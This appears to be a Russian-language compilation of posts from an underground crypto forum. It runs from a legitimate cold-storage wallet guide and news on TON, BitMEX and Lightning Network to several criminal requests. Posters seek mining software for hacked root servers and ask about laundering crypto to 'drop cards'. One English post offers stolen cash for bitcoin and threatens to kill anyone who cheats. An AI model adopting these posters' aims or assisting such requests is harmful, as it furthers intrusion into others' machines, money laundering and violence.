После того, когда новая транзакция будет подтверждена и включена в блок - все встанет на свои места и она будет доступна в любом блок-эксплорере.

Двойная трата заключается не только в том, чтобы собрать новую транзакцию, а в том, чтобы еще и разослать ее по сети, и не просто по сети, а чтобы она добралась до майнеров, до пулов, и не просто добралась до них, а чтобы пулы захотели включить ее в блок.

Чтобы пул захотел включить вашу транзакцию в блок и предпочел ее всем остальным, нужно чтобы комиссия вашей транзакции была как минимум столько же, сколько текущие актуальные комиссии в сети, а лучше чтобы комисссия транзакции двойной траты превышала актуальную комиссию на 10-20-30%

Так как для того, чтобы транзакция двойной траты разошлась по сети, нужно ощутимо больше времени, чем просто для обычной транзакции, о которой все ноды знают уже через 5-10-15 секунд, то за это время, пока транзакция разойдется, количество транзакций в мемпуле может существенно вырасти и как следствие вырастет величина комиссии.

И когда ваша новая транзакция с обычной или даже низкой (на момент отправки) комиссией доберется до того или иного пула - она будет ему уже неинтересна, потому что у него в очереди есть много более интересных транзакций, которые он возьмет вперед. А схема с двойной тратой и последующим ускорением Антпулом или ВиаБТЦ тоже не дает никаких гарантий, так как именно до этих пулов транзакция может и не добраться, например. Тем самым вы, конечно, сэкономите несколько тысяч сатошей, но потеряете время. И иногда потеря времени обходится сильно дороже.

​

На фотографии: к.ф.-м.н. Николай Дуров, автор протокола шифрования MTProto, ряда ключевых подсистем «ВКонтакте» и блокчейн-платформы TON

Telegram в течение месяца покажет инвесторам блокчейн-платформу TON (Telegram Open Network) для криптовалюты Gram. Несколько источников издания The Bell и газеты «Ведомости» подтвердили, что встреча состоится в Дубае, хотя точная дата ещё не назначена. Запуск основной сети запланирован на март.

О плане разработать блокчейн-платформу с собственной криптовалютой Павел Дуров объявил в январе 2018 года. TON должен решить ключевую проблему современных криптовалют — низкую производительность, что мешает полноценно заменить глобальные платёжные системы. Если Visa и Mastercard обрабатывают около 50-60 тыс. операций в секунду, то Bitcoin и Etherium — всего 7 и 15 операций в секунду, соответственно.

Сотни миллионов пользователей Telegram помогут системе быстро развернуться на большую аудиторию. В качестве некоей модели можно рассматривать китайский мессенджер WeChat, который стал уже стандартом для проведения финансовых платежей в Китае.

Click to expand...

как думаете,у валюты есть будущее? будете вкладываться?

В общем-то наблюдая за постоянными скачками курса битка пришла в голову идея написать бота.
Алгоритм простейший:
- Биток упал на 300$ - закупаем, ждём когда поднимется на 600$
- Биток поднялся на 600$ - меняем в другую валюту
- Ждём, когда биток упадёт на 300$
...Цикл повторяется

Какие подводные камни вы видите?
Я пока что вижу только один: возможно, на комиссиях мы проебем больше, чем заработаем (всего-то).
В принципе можно поискать какую-нибудь биржу с минимальными комиссиями на обмен, но даже если получится найти - профит со всего этого мракобесия будет такой себе. С тем же успехом можно по рекламе за сатоши потыкать.

Вообщем вопрос заголовке!Что на сегодняшний день лучше майнить,майнил монеро,так после форка сложность пизд..ц выросла,вот думаю куда можно мощности перекинуть!

ваще нуль в майне, так получилось.
не пинайте старпера)))

к примеру

есть 5 dedicated серваков, линь,
поломаных с рутом. обычные, не навароченные. 2-6 ядра
скорости тож стандарт 100мбсек

какую софтину посоветуете?
"из коробки" попроще, чтоб воткнуть и заработала)) и уже по ходу разбираться...

[Источник статьи](https://********.net/index.php?threads/xranenie- kriptovaljuty.155929/)

Введение

Мир без посредников. Мир без необходимости доверять третьей стороне. Мир где каждый сам себе автономный банк. С идеей о таком мире создавалась первая криптовалюта и затем многие другие блокчейн-проекты. В таком мире “твой пароль = твои деньги” если говорить упрощенно. Если точнее: “твой приватный ключ = твои деньги/активы/права/документы/личность”.

Если это для тебя понятно — то ты молодец. Большинство людей продолжают думать, что Биткоин, это что-то типо вебмани с хорошей криптографией, а Блокчейн — это название компании, которая владеет сайтом blockchain.info. Но не только такие люди постоянно теряют свою кровно заработанную крипту или если не теряют, живут с высокими шансами в один прекрасный день ее потерять. Почему? Причин много — от низкой компьютерной грамотности и недостатка образования до обычной лени. Если ты думаешь — что ты сможешь выжить в новом цифровом мире без компьютерной грамотности, то у меня для тебя плохие новости.

“Мир криптовалют — это новое поле для злоумышленников. Он идеально подходит для реализации их темных амбиций”.

Click to expand...

Посудите сами:

• Все сводится к получению приватного ключа — а значит огромное разнообразие мест, где эти приватные ключи могут хранится от личных пк c Windows и Android смартфонов до серверов онлайн-кошельков и крипто-бирж. По сути тут возможны все векторы атак, которые в принципе могут существовать в интернете.
• Нет банковских проверок и блокировок
• Нет лимитов на переводы
• Никто не сможет откатить транзакцию
• Относительно легко достижимая анонимность на всех этапах
• Украденные средства можно отмыть в два клика через биржи с анонимной регистрацией, конвертнув их в приватные валюты типо Monero или Zcash
• Все процессы можно автоматизировать

Для тех, кто понимает, что криптовалюты к нам пришли всерьез и надолго, перспектива роста интереса злоумышленников разных сортов (в том числе из государственных структур) к этой теме не вызывает сомнений. Безопасность хранения и использования крипты — важнейшее направление, в котором еще не решено множество вопросов и проблем.

Как грамотно подойти к хранению крипты?
Ответ простой:

“Никому не передавать свой приватный ключ”

Click to expand...

Это значит, НЕ хранить крипту (большую ее часть) на:

• Онлайн кошельках типо blockchain.info, xapo и подобных. Вообщем на всех онлайн-сервисах, которые берут на себя хранение приватных ключей
• Централизованных биржах, потому что биржа — это как банк, который все плохие дяди хотят ограбить. А иногда и сами владельцы банка поддаются соблазну и устраивают собственное ограбление, выставляя себя жертвами.
• Мобильных приложениях — кошельках. До сих пор в Android и iOS к вашим данным могут получать доступ другие приложения, скачанные из сторов, а тем более сами корпорации Apple и Google. В этом направлении ведутся разработки, но по-настоящему безопасных кошельков пока нет.
• Любых системах, которые подключаются к интернету. Особенно на рабочих ПК и ноутбуках
• На кошельках с закрытым исходным кодом
• Не вводить приватные ключи в системах и в софт, которым вы не доверяете

Правильный метод хранения криптовалют называется “Холодное хранение”. Под этим подразумевается хранение приватных ключей на носителях, которые никогда не подключаются к сети:

• USB носитель
• Аппаратный кошелек (hardware wallet)
• Бумажный кошелек (paper wallet)
• Физический биткоин

Формулировка “ никогда не подключаются к сети ” может вызывать недоумение. Ты спросишь — “А как же тогда отправить транзакцию?”

Да конечно чтобы отправить транзакцию (broadcast transaction) нужен выход в сеть. Но фишка в том, что создать транзакцию и подписать ее можно оффлайн. А затем уже подписанную транзакцию смело перенести на машину с интернетом и отправить в сеть, используя любое окно с подключением к блокчейн-ноде хоть тот же блокчейн эксплорер.

Подписанная транзакция содержит инструкции что надо сделать в сети, которые криптографически подписаны вами. Достать оттуда ваш приватный ключ невозможно (обратным инжинирингом например). Может ли хакер как-то использовать подписанную транзакцию против вас?

Нет, все что он может это просто отправить транзакцию в сеть ещё раз. Сеть отвергнет вторую транзакцию, т.к. транзакция с одинаковым хешем может исполнится в сети только один раз.

Вообщем идея в том, что мы можем разделить процессы создания, подписи и отправки транзакции. И в этом разделении таится большая мощь и гибкость, которую стоит использовать.

Что мы собираемся сделать в этом гайде?
Наша задача — организовать систему, чтобы было безопасно и удобно делать следующее:

1. Торговать на централизованных биржах
2. Обналичивать крипту в фиат через Localbitcoins.com
3. Использовать dapps. По большей части для торговли на децентрализованных биржах — EtherDelta, IDEX, Bitshares но и другие, например CryptoKitties
4. Отправлять небольшие сумм с горячих кошельков
5. Хранить основную часть криптоактивов на холодных кошельках
6. Отправлять крипту с холодных кошельков

Для использования dapps нам не обойтись без кошельков. А значит требования к безопасности повышаются. Зашифрованная виртуальная машина Ubuntu с Metamask — будет оптимальным решением для частого использования dapps, торговли на децентрализованных биржах и отправки небольших сумм.

Для хранения основного капитала — мы будем делать мультивалютное холодное хранение. Нам нужно иметь изолированную от интернета переносную операционную систему. Внутри такой ОС мы установим кошельки для всех интересных нам криптовалют чтобы создавать и подписывать транзакции оффлайн и затем переносить подписанные транзакции на горячую машину с помощью второй флешки.

“Постоянно загружаться в разные ОС и копировать транзакции на флешку? Звучит не очень то удобно” — скажешь ты. Если тебя пугает такая возня — я советую присмотреться к покупке аппаратного кошелька.

Аппаратные кошельки работают по такой же схеме, но с некоторыми преимуществами:

• Приватный ключ хранится в защищенной области микроконтроллера
• Нет возни с флешками и разными ОС. Подпись работает безопасно и удобно прямо в горячей машине
• Интеграция с множеством приложений

Некоторые кошельки (например [Ledger Nano S](https://www.ledgerwallet.com/r/37af?path=/products/ledger- nano-s&tracker=ledger)) поддерживают более 25 криптовалют, имеют открытый исходный код по и железа и стоят всего 80 долларов.

Недостатки аппаратных кошельков:

• Максимум четыре одновременно активные криптовалюты
• Набор доступных валют ограничен и зависит не от тебя
• Выдают своё предназначение
• Стоят денег

Поэтому выбор за тобой — пойти простым путём или по-сложнее, но зато более интересным. Этот гайд затрагивает тему использования софта, бирж и dapps достаточно широко. Поэтому будет полезен всем, в том числе владельцам аппаратных кошельков.

Далее пойдет туториал по организации самостоятельного хранения и использования для самых популярных криптовалют.

Никаких специфических навыков от тебя не требуется. Но без минимальной компьютерной грамотности не обойтись + желательно умение пользоваться ментальным или программным англо-русским переводчиком. Еще тебе понадобится:

• Компьютер или ноутбук
• Две флешки от 8Gb (да именно две и именно не меньше 8 гигов)
• Бумага/книжка/блокнот и хорошая ручка

В результате выполнения туториала у тебя будет:

1. Безопасный браузер в основной рабочей ОС для работы на биржах и других критически важных сервисах.
2. Виртуальная машина для операций с небольшими суммами и использования Web3 dapps
3. Безопасный мультивалютный кошелек на загрузочном USB. Как минимум для: Bitcoin, Ethereum/Ethereum Classic + ERC20 токены, Monero, Bitshares, Litecoin, Stellar, NEO, Ripple, IOTA, DASH, NEM. Список можно расширить
4. Проверенная схема организации бекапов, аккаунтов, адресов, паролей и 2FA кодов
5. Система мониторинга холодных кошельков
6. Система реагирования в случае кражи

Поехали!

1. Безопасная торговля на биржах
Торговлю на биржах и Localbitcoins — удобнее и вполне безопасно вести с основной рабочей операционной системы.

Основные векторы атак тут:

1. Фишинг
2. Подмена DNS
3. Атаки Man in the Middle

Чтобы обезопасить себя от этих атак, надо быть прежде всего внимательным и пользоваться безопасным браузером. Firefox — считается одним из самых безопасных браузеров при правильной конфигурации и наличии нужных расширенний.

Настраиваем Firefox:

1. Включаем защиту от фишинговых сайтов

2. Устанавливаем HTTPS Everywhere — принудительно включает HTTPS везде, где это возможно. Это защитит вас от MitM атак.

3. Всегда проверяем имя и сертификат сайта. Проверка сертификата убедит нас в том, что DNS не подменен. Можно использовать CipherFox чтобы удобнее проверять сертификат сайта.

Настраиваем доступ на биржи:

1. Настраиваем двух-факторную аутентификацию (2FA) через Google Authenticator везде, без исключений, в том числе на почте, которую используем для бирж.
2. При создании 2FA выписываем все сервисные коды в файлик 2fa.txt. Cервисные коды помогут восстановить доступ если вы потеряете устройство на котором стоит Google Authenticator.
3. Ставим сервисный пароль на вывод средств, если на бирже есть такой функционал. Это поможет защититься от самых хитрых и автоматизированных атак.

Файл 2fa.txt мы потом забекапим вместе с приватными ключами.

О менеджерах паролей

Это очень удобно. Но я бы не рекоммендовал использовать сторонние приложения для этого, потому что они часто оказываются желанной целью для хакеров. Стандартного менеджера паролей в Firefox вполне достаточно. Я бы также не рекомендовал настраивать синхронизацию паролей, выигрыш в удобстве тут сомнительный как по мне, а рисков сразу становится очень много. Пусть все хранится локально

2. Виртуальная машина для dapps
В качестве виртуалки будем использовать Ubuntu. Почему Ubuntu? Потому, что безопасней чем Windows и это самый простой и понятный Linux дистрибутив для начинающих.

Качем VirtualBox (программа для виртаулизации) "Тут должен быть линк на прверенную виртуалку"

Качаем .iso образ с Ubuntu с официального сайта: https://www.ubuntu.com/download/desktop

Устанавливаем VirtualBox и потом в него ставим Ubuntu. Отличная инструкция со скриншотами нашлась вот тут:
http://profitraders.com/Ubuntu/VirtualBoxUbuntuInstall.html

Установка Metamask

Metamask — расширение для браузеров Chrome, Firefox и Brave с открытым исходным кодом, которое представляет собой Ethereum кошелек. Приватные ключи никуда не отправляются.

Через Metamask вы можете взаимодействовать с децентрализованными приложениями (dapps), которые использую web3.js библиотеку. Например вы можете подключится к децентрализованной бирже EtherDelta или IDEX, играться в CryptoKitties, покупать доменные имена в Ethereum ENS.

Большой список dapps можно найти тут .

Устанавливаем Metamask в Firefox и создаем кошелек (видео в помощь), записываем 12 слов на бумажку/блокнот/книжку и копируем в файлик privkeys.txt. Также создадим еще файлик pubkeys.txt куда скопируем ETH адрес. Пока оставим эти файлы на виртуальной машине.

После этого останется закинуть немного ETH на адрес нашего Metamask кошелька и можно пользоваться.

Шифруем виртуалку

После настройки нашей ВМ и установки всего нужного ПО, следует включить шифрование для VDI диска (это диск где хранятся файлы виртуальной машины).

1. Для этого выключите (Power Off) Ubuntu.
2. Перейдите в Настройки > Шифрование > Введите пароль > Ок

3. Загрузочный USB для холодных кошельков
Будем использовать Tails в качестве портативной операционной системы. Почему именно Tails? Потому что эта Live USB система, она специально затачивалась на приватность и безопасность. Она построена на Debian — самом надежном дистрибутиве линукс, с минимально нужным софтом. А еще Tails поддерживает сохранение ваших данных в зашифрованной области.

• Идем на официальный сайт https://tails.boum.org/install/os/index.en.html
• Выбираем ОС вашего компьютера/ноутбука, с которого будет происходить установка
• Далее откроется подробная инструкция по установке на английском языке
• Следуем инструкции: устанавливаем сначала на одну флешку live версию, потом загрузившись с live делаем полноценную установку на другую флешку

Настройка зашифрованной области хранения (Encrypted Persistent) в Tails

Encrypted Persistent — это зашифрованный раздел на вашем USB, на котором мы собираемся хранить:

• ПО кошельков и других программ, которые установите
• Конфигурационные файлы для этих программ
• Приватные ключи от кошельков
• txt файл с адресами и публичными ключаи

В случае утери флешки, даже если нашедший окажется достаточно заинтересованным и подкованным, чтобы попробовать расшифровать ее, шансы на успех атаки перебором будут стремится к нулю если у вас достаточно стойкий пароль.

Стойкий пароль — это рандомный набор из более 20 символов с цифрами, символами и буквами в разных регистрах. Не ленитесь сделать стойкий пароль! Запишите его для начала на бумагу, но потом лучше выучите наизусть.

Создаем Encrypted Persistent на Tails:

1. Загружаемся в уже установленную Tails на USB> входим в систему
2. Applications > System Tools > Configure persistent volume
3. В окошке вводим стойкий пароль, нажимаем Create и ждем
4. Появится окошко для выбора приложений, данные которых мы хотим сохранять. Выбираем Personal Data и Electrum (Bitcoin Client) > Нажимаем Save
5. Перезагружаемся. Теперь при входе в окошке “Use Persistence?” выбираем YES и вводим пароль
6. Все мы в системе с Encrypted Persistent. Теперь переходим к установке кошельков в папку Personal Data.

Если не получилось, вот видео инструкция

Качаем холодные кошельки для Tails
Подходим к самой интересной части — к установке и созданию различных кошельков. Но сначала нам нужно все это добро скачать, закинуть на флешку и перенести на Tails.

Тут у тебя может возникнуть вопрос: “ Как кошельки поместятся на флешке?” . Ведь блокчейн Биткоина весит более 165 Гб на момент написания статьи.

Разумеется мы не можем на флешке 8Гб использовать кошельки, которые скачивают весь блокчейн. Нам нужны только “легкие клиенты”, которые используют SPV механизмы для верификации транзакций.

SPV или Simplified Payment Verification — это механизм проверки конкретной транзакции в блоке, без скачивания всего блока. Иначе говоря, этот механизм позволяет проверять только свои транзакции, без заботы о проверке чужих транзакций. Т.е. при этом не надо скачивать весь блокчейн и становится “полной нодой”.

SPV — это не какая-то новая штука. Этот механизм упоминался в оригинальной бумаге Сатоши Накамото Bitcoin: A Peer-to-Peer Electronic Cash System . SPV работает в кошельке Electrum c самого его появления. В Ethereum есть аналогичный концепт [LES](https://github.com/zsfelfoldi/go-ethereum/wiki/Light-Ethereum- Subprotocol-%28LES%29), как и в многих других системах. И вся штука работает вполне надежно, до тех пор пока большинство нод являются добросовестными. На примере Electrum злоумышленник может захватить большинство Electrum Servers и тогда вы можете начать получать транзакции, которые в действительности невалидны и не присутствуют в основном блокчейне. Вы подумаете, что вам заплатили, а на самом деле нет. Подстраховаться тут можно очень просто — дополнительно проверять подтверждения транзакций через блокчейн-эксплореры.

Нам подойдут только “легкие клиенты” , которые соответствуют следующим требованиям:

• Открытый исходный код!
• Приватные ключи никуда не отправляются
• Качаем только с официальных репозиториев и сайтов
• Сборка стабильна и прошла проверку сообществом

Тут самое важное: это НЕ скачать вредоносный софт. Поэтому всегда проверяем url и сертификат на сайте.

Ниже представлены кошельки, которые использую я сам. Качать будем сборки для Debian (дистрибутив на котором построена Tails). Поехали!

Bitcoin

Наш выбор Electrum — один из старых и надежных легких клиентов с открытым исходным кодом. Electrum изначально предустановлен в Tails. Качать ничего не надо

Ethereum/Ethereum Classic and ERC20 tokens

Будем использовать локальную версию MyEtherWallet сайта, скачанную с официального репозитория. MEW — это полностью client-side кошелек. Это значит, что весь код для создания, подписи и отправки транзакции находится локально у вас на компьютере в вашем браузере в html и js коде этого веб-приложения.

Используя локальную версию, вы не подключаетесь никуда. А значит вы обезопашены от атак перехвата трафика, фишинга и подмены DNS. Создавать транзакции можно оффлайн.

Качаем из официального репозитория
https://github.com/kvhnuke/etherwallet/releases/download/v3.21.09/etherwallet-v3.21.09.zip

Распаковывем архив и запускаем фалик index.html — это все, что нужно чтобы стартануть MEW локально

Click to expand...

MEW можно использовать для хранения ETH и ETC. И конечно для всех ERC20 токенов, например ZRX, REP, ANT, DNT и т.д.

Monero
MyMonero — одобренный сообществом легкий клиент. Качаем с оффициального репозитория версию для Linux:
https://github.com/mymonero/mymonero-app- js/releases

Litecoin

Electrum-ltc — зарекомендовавший себя форк Electrum для Litecoin. Код откры. Качаем для Linux

https://github.com/pooler/electrum-ltc/releases

Stellar

Foxlet wallet — одобренный Stellar легкий кошелек. Код открыт. Качаем для Linux

https://github.com/stellarchat/desktop-client/releases

NEO

Официальный легкий кошелек от сообщества. Код откры. Качаем для Linux

https://github.com/CityOfZion/neon-wallet/releases

Ripple

Toast Wallet — неофициальный легкий клиент — наш выбор. Код открыт. Качаем для Linux

https://toastwallet.com/

IOTA

Официальный кошелек может работать в режиме “легкого клиента”. Качаем для Linux

https://github.com/iotaledger/wallet/releases

DASH

Electrum-dash — официально одобренный кошелек. Качаем для Linux

https://electrum.dash.org/#download

NEM

Nano Wallet — официальный легкий клиент. Качаем для Linux

https://nem.io/downloads/

Устанавливаем и настраиваем холодные кошельки в Tails
К этому моменту мы скачали все сборки нужных нам кошельков и закинули их на флешку. Теперь вставляем USB с Tails и загружаемся в нее. Не подключаемся к интернету!

Создадим внутри домашней директории папку, назовем ее например Wallets. Вставляем вторую флешку со сборками и перекидываем все файлы в папку Wallets.

Далее по очереди устанавливаем и создаем наши кошельки.

1. Распаковываем архив/запускаем dpkg установщик
2. Переходим в папку/следуем всем шагам
3. Запускаем кошелек
4. Создаем новую пару приватный-публичный ключ
5. Копируем каждый приватный ключ в файлик (например privkeys.txt) с пометкой от какой он блокчейн системы. Этот txt мы потом надежно зашифруем и забекапим
6. Записываем приватный ключ на бумагу/блокнот/книжку
7. Придумываем надежный пароль, чтобы зашифровать файл приватного ключа внутри кошелька
8. Копируем адреса и публичные ключи в другой файлик (например pubkeys.txt). Нам нужен публичный ключ и адрес/a (часто это не одно и тоже). Этот txt мы потом перенесем на горячую машину

Процесс везде одинаковый и интуитивно понятный. В Tails вы можете устанавливать сторонние приложения только в свою папку Personal Data. У вас могут возникнуть проблемы с зависимостями, тогда их надо установить отдельно. Тут надо гуглить в каждом отдельном случае.

Отправляем крипту с холодных кошельков

Чтобы было максимально безопасно — к интернету подключаться нельзя. Поэтому схема такая:

1. Закидываем на флешку в txt файле адреса на которые нужно отправить и суммы (если это важно)
2. Загружаемся в Tails с включенным Persistence Storage
3. Запускаем нужный кошелек и создаем транзакцию
4. Нам надо получить Signed Transaction
5. Копируем этот набор символов на флешку в файлик типо transactions.txt
6. Загружаемся в горячую ОС и делаем broadcast транзакции через блокчейн эксплорер например для Битка тут, для Эфира тут

4. Watch-only кошельки
На горячей машине мы собираемся сделать “watch-only” кошельки. Watch-only — это такой кошелек, через который мы можем наблюдать свои балансы, принимать платежи и генерировать новые адреса (через публичный ключ), но не можем ничего отправить, т.к. приватного ключа там нет.

Нам понадобятся наши адреса и публичные ключи от созданных ранее кошельков. Переносим с помощью флешки файлик pubkeys.txt на горячую машину.

В качестве watch-only кошелька можно использовать блокчейн-эксплорер или софт кошелька с импортированным публичным ключом. Разница в том, что через софт с публичным ключом мы можем наблюдать балансы на всех своих адресах и генерировать новые адреса. А через блокчейн-эксплорер мы можем наблюдать только конкретные адреса.

Создадим watch-only для Биткоина в Electrum:

1. Качаем Electrum на горячую машину

2. Запускаем, выбираем создать кошелек

3. Выбираем “standart wallet”

4. Далее выбираем “use a master key”

5. Вставляем ПУБЛИЧНЫЙ ключ от биткоин кошелька, который мы сохранили в pubkeys.txt. Публичный — этот который начинается с xpub

Нажимаем Next и наш watch-only кошелек создан. В нем вы можете смотреть балансы, генерировать адреса и принимать платежи, но не можете ничего отправить.

Тоже самое делаем для остальных интересных нам криптовалют. Везде принцип одинаковый, но для некоторых достаточно блокчейн-эксплорера:

Ethereum/Ethereum Classic:

https://etherscan.io/address/0x0000000000000000000000000000

Где вместо 0x00… вставьте ваш адрес. Я лично сделал закладки для всех своих адресов в отдельной папке.

Bitshares:

https://cryptofresh.com/u/yourname

Stellar:
https://stellarchain.io/address/youraddress

NEO:

https://neotracker.io/address/youradress

Ripple:

https://bithomp.com/explorer/

IOTA:

https://iotasear.ch/address/youraddress

NEM:

http://explorer.nemchina.com/#/s_account?account=youraddress

Для DASH, LTC все делаем по аналогии в Electrum.

Для Monero инструкция тут <https://getmonero.org/resources/user- guides/view_only.html>

5. Мониторинг холодных кошельков
Когда мы можем поглядывать за нашими балансами через watch-only кошельки — было бы здорово автоматизировать это дело и мгновенно получать уведомления о всех входящих и исходящих транзакциях на холодных кошельках.

Для этих целей можно написать свой мониторинг в гугл табличке [например](https://forum.bits.media/index.php?/topic/60682-google- spreadsheet-%D0%B4%D0%BB%D1%8F-%D0%B0%D0%B2%D1%82%D0%BE%D0%BC%D0%B0%D1%82%D0%B8%D0%B7%D0%B0%D1%86%D0%B8%D0%B8-%D0%B8-%D1%83%D0%BF%D1%80%D0%B0%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F-%D1%81%D0%B2%D0%BE%D0%B8%D0%BC-%D0%BA%D1%80%D0%B8%D0%BF%D1%82%D0%BE-%D1%84%D0%BE%D0%BD%D0%B4%D0%BE%D0%BC/). Или использовать какие-то специальные сервисы/ботов.

Например MyETH_bot для отслеживания балансов ETH и всех ERC20 токенов. Бот проверяет ваш кошелек каждые 30 секунд и реагирует очень быстро. Правда есть ограничение в один ETH адрес на пользователя.

Для Биткоина и других валют я не нашел никаких сервисов и сделал мониторинг в гугл таблице с помощью Google Apps Script.

6. Что делать в случае кражи?
Чтобы обчистить весь твой ETH кошелек со всеми ERC20 — надо под каждый токен делать новую транзакцию. Во-первых это занимает время, во-вторых в Эфириуме возможно перебивать ([Replace By Fee](https://ethereum.stackexchange.com/questions/6303/does-ethereum-have-a- replace-by-fee-option-similar-to-bitcoin)) свои же транзакции. И это дает нам шанс опередить злодея и спасти часть средств. И если нужно — вывести все другие криптовалюты на резервные кошельки (или на биржу если таковых нет)

Очень важно быть подготовленным к такому. Тут все упирается в удобство и скорость реакции. В случае с Tails — это конечно будет не так быстро по сравнению с аппаратным кошельком, но когда крипты много и она разная — 10–30 минут вполне должно хватить чтобы успеть опередить хакера.

В идеале такой процесс надо полностью автоматизировать. Например с помощью своего защищенного VPS сервера, на котором работают все кошельки и скрипт, который по нашему сигналу тревоги стартует операцию по автоматизированному выводу средств на резервные кошельки.

Кстати через MyETH_bot можно отсылать кастомные callback запросы в случае тревоги. По сути уже сейчас можно использовать его для настройки такой системы реагирования. Но это тема для отдельного гайда.

7. Организуем бекапы
Как только все кошельки созданы, нужно надежно забекапить все наши приватные ключи,пароли и сервисные коды от Google Authenticator. Это действие достаточно сделать один раз, но оно критически важное.

Ваши бекапы могут выглядеть вот так:

1. Выписанные ключи и пароли в бумагу/блокнот/книжку
2. Зашифрованные файлы приватных ключей внутри Tails USB
3. Файл privkeys.txt и 2fa.txt в зашифрованном zip архиве на флешке. Храним отдельно от флешки с Tails (например у родителей или в банковской ячейке)
4. Файл privkeys.txt и 2fa.txt в зашифрованном архиве в надежном облаке (например Google Drive). Как дополнительный вариант.

Cоздаем зашифрованный архив

1. Поместим все файлы, которые мы хотим защитить паролем и забекапить в отдельную папку. Например folderx
2. Правой кнопкой мыши нажмем на папку folderx и выберем Compress…
3. Раскроем меню “Other options” и введем стойкий пароль в Ubuntu

3.1 В Tails делаем это командой в терминале:
zip --encrypt folderx.zip -r folderx

где folderx — это папка со всеми файликами

4. Нажем Create и наш архив будет создан. После этого останется только перекинуть его на флешку и в облако

Вот такую статью скопипастил с просторов ВВХ. Хотел бы узнать у спецов мнение про излишнюю параною и хранение крипты на оффлайн кошельках. С точки зрения отсутсвия возможности украсть - целесообразно. А вот насколько целесообразно так делать, если хочется отмыть крипту и вывести ее, скажем, на дроп карты?

Тема частично обсуждалась тут и тут, но как-то обсуждение там теряется

Задача: зафиксировать курс битка, все равно как. USTD или какими-то другими решениями. стейблкоинами или кошелями, чем угодно. Что посоветуете? Без хранения на биржах. Без вывода в нал. Без использования онлайн кошелей или кошелей, где возможны локи и верификации
насколько можно, безопасно, тк сумма большая

I have 2,000,000 euros in cash in Italy and I need someone to sell me BTC but in person. Exchange them for BTC on the spot because I can't account for a judicial / financial issue in this country and because it's money stolen. I want to buy BTC. I am in Italy and do it in person. I recommend that if we get to face it and want to steal it, we can kill them. Only serious people with BTC.

На крупнейшей бирже биткоин-деривативов BitMEX произошла утечка пользовательских данных. Некоторые пользователи получили письма, содержащие электронные адреса других клиентов платформы.

Представители биржи заверили, что предприняли «немедленные действия» для устранения проблемы. Масштаб утечки пока не сообщается.

Некоторые пользователи Twitter опубликовали скриншоты полученных писем:

__https://twitter.com/x/status/1190167326898806784

Можно предположить, что сотрудники BitMEX забыли поставить адресатов e-mail рассылки в «скрытую копию» письма, из-за чего приватность пользователей и была скомпрометирована.

Отреагировали на утечку и другие игроки рынка. Так, биткоин-биржа Binance призвала своих пользователей сменить адреса электронной почты, если они используются для аккаунтов на нескольких биржах. При этом Binance напрямую не указала, связано ли это с проблемами BitMEX.

Апдейт: После утечки e-mail адресов пользователей биржи, официальная страница BitMEX в Twitter была взломана и от ее имени были опубликованы два твита:

«Забирайте свои биткоины и бегите».
«Взломали».

Click to expand...

На данный момент обе записи удалены.

Что такое Lightning Network?

Существует проблема масштабируемости биткоина. Она связана с ростом популярности Биткойна, число транзакций увеличилось, но из-за ограничения максимального размера блоков не все транзакции «помещались» сразу, периодически возникала очередь. И с ростом популярности это очередь становится всё больше. Предполагается, что Lightning Network решит эту проблему. Технология основана на обычных биткойн-транзакциях, но суть в том, что LN не записывает все транзакции, а только открывающую и закрывающую транзакцию, в которых можно проследить результат всех проделанных вне блокчейна транзакций. Эти внеблокченовые транзакции сохраняются на локальных узлах пользователей, но могут быть отправлены в сеть в любой момент, а это значит, что пользователи должны находиться в онлайне, пока не отправиться финальная транзакция в биткоин-сеть. Таким образом, Lightning Network существенно разгрузит очередь транзакций. При этом экономия работы сети снизит цену за транзакцию на столько, что возможно поощрение пользователей сети LN, то есть существует вероятность, что вы получите небольшую награду за использование сети. Также создатели Lightning Network поработали над безопасностью своей сети. Не буду углубляться в [технические элементы](https://bitnovosti.com/2016/06/22/understanding-the-lightning- network/), но скажу лишь, что недавно на сеть LN была совершена DDOS-атака и уязвимостей сети не выявлено. На момент написания поста Lightning Network уже запущен в мейннет биткоина, и, как показывает трекер, там функционировали уже 1343 Lightning-нод и были открыты 3910 канала. В свою очередь разработчики убеждены, что полномасштабная активация протокола может стать одним из важнейших событий за всю историю существования «цифрового золота».

Как работает Lightning Network

Вход в сеть Lightning осуществляется через открытие платежного канала. Для этого требуется транзакция в блокчейне (тот, в который всегда записываются транзакции). Канал оплаты позволяет отправлять биткоины между двумя сторонами (это не новая разработка). LN можно сравнить с криптовалютной биржей - на биржу вы заводите какое то количество денег и можете переводить на другой аккаунт внутри системы без комиссий. Плата комиссии происходить только за внесение денег на биржу. Аналогично, для Lightning — чтобы открыть или закрыть платежный канал, нужно выполнить транзакцию биткоинов.

Хэш-контракты временной блокировки (HTLC) — это смарт-контракты, которые гарантируют, что получателю переведут средства при выполнении некоторых криптографических условий. Это делается для безопасности.

Сеть Lightning использует серию HTLC с одним и тем же секретным хэшем. Этот процесс можно повторять столько раз, сколько необходимо.

Преимущества Lighting Network:

Возможны крошечные платежи: поскольку сборы пропорциональны сумме платежа, можно заплатить часть процента; учет ведется в тысячных долях сатоши.

Платежи производятся мгновенно: деньги отправляются мгновенно. Обычно занимает доли секунды на отправку по сети информации до отправителя.

Повышенная конфиденциальность: не каждая транзакция хранится в публичном блокчейне. В блок записывается только 1 транзакция, когда платежная цепочка в конечном счете закрывается, а остаток выплачивается обеим сторонам.

Возможность заработка на поддержке узла (посредничество при транзакции).

Повышенная безопасность средств - средства, заблокированные в канале невозможно украсть. Самое худшее, что может сделать злоумышленник — это закрыть канал для получения доступа к той части средств канала, которые принадлежат бирже. По видимости, это произойдёт без согласия пользователя. Тем не менее, хакеру придётся дождаться снятия блокировки по времени, встроенной в канал (как правило, несколько дней). В течение этого времени биржа может восстановить контроль или пользователи могут закрыть свои каналы.

Существует система защиты от оплаты двойной комиссии. Если была осуществлена отправка средств от одного кошелька на другой кошелек дважды, то система определит этот как 1 перевод.

Конфиденциальность. Так как в блокчейн записывается только начальные данные и финальный результат, а операции между пользователями - нет.

Снижение нагрузки сети блокчейна биткоина. Как я говорил ранее не все транзакции записываются.

Открытость финальной транзакций. Мы всё таки можем посмотреть изменения балансов пользователей, ориентируясь по транзакции отправленной в блокчейн.

Неосведомлённость посредника. Посредник не знает занимает ли он первую, последнюю или промежуточную позицию.

Безопасность. Наличие хэш-контрактов временной блокировки гарантируют, что получателю переведут средства при выполнении некоторых криптографических условий.

